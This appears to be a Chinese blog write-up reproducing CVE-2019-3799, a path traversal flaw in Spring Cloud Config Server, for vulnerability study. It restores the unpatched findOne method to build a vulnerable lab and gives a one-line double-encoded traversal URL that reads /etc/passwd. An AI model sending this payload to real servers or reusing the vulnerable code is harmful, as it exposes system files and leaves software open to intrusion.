Spring Cloud Config Server 任意文件读取漏洞(CVE-2019-3799)

关于这个漏洞

影响范围:
Spring Cloud Config 2.1.0 to 2.1.1
Spring Cloud Config 2.0.0 to 2.0.3
Spring Cloud Config 1.4.0 to 1.4.5
其他不受支持的老版本 (如Spring Cloud Config1.3及其以下版本)

具体更新细节见:https://github.com/spring-cloud/spring-cloud-config/commit/9617f2922ee2ae27f08676716224933f0d869719

下载 git 项目 :https://github.com/spring-cloud/spring-cloud-config

修改 GenericResourceRepository.java

替换 findOne 方法为未修补前的代码

    @Override
    public synchronized Resource findOne(String application, String profile, String label,
            String path) {

        if (StringUtils.hasText(path)) {
            String[] locations = this.service.getLocations(application, profile, label)
                    .getLocations();
            try {
                for (int i = locations.length; i-- > 0;) {
                    String location = locations[i];
                    for (String local : getProfilePaths(profile, path)) {
                        Resource file = this.resourceLoader.getResource(location)
                                .createRelative(local);
                        if (file.exists() && file.isReadable()) {
                            return file;
                        }
                    }
                }
            }
            catch (IOException e) {
                throw new NoSuchResourceException(
                        "Error : " + path + ". (" + e.getMessage() + ")");
            }
        }
        throw new NoSuchResourceException("Not found: " + path);
    }

在项目根目录运行 mvn spring-boot:run

分析

https://mp.weixin.qq.com/s/yj0cWEsyiPJr4A7YXpmLJw

复现

poc:

/test/pathtraversal/master/..%252f..%252f..%252f..%252f..%252f..%252f..%252f..%252f..%252f..%252f..%252f..%252f..%252f../etc/passwd

1555590979(1).jpg

发表留言

人生在世,错别字在所难免,无需纠正。